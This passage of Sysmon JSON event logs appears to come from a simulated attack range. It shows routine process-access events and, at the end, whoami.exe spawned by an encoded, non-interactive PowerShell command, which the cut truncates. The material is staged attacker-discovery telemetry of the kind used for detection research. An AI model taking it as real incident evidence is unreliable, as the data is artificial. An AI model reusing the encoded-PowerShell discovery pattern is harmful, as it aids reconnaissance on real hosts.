C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5624,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5625,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5626,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5627,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5628,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5629,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5630,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-0010C24B0800}\r\nTargetProcessId: 2772\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-0010C24B0800}","TargetProcessId":"2772","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5631,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.425\r\nProcessGuid: {E2A3D6B1-11D6-5F25-0000-0010E54C0800}\r\nProcessId: 4624\r\nImage: C:\\Windows\\System32\\whoami.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: whoami - displays logged on user information\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: whoami.exe\r\nCommandLine: \"C:\\Windows\\system32\\whoami.exe\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9\r\nParentProcessGuid: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nParentProcessId: 4848\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand 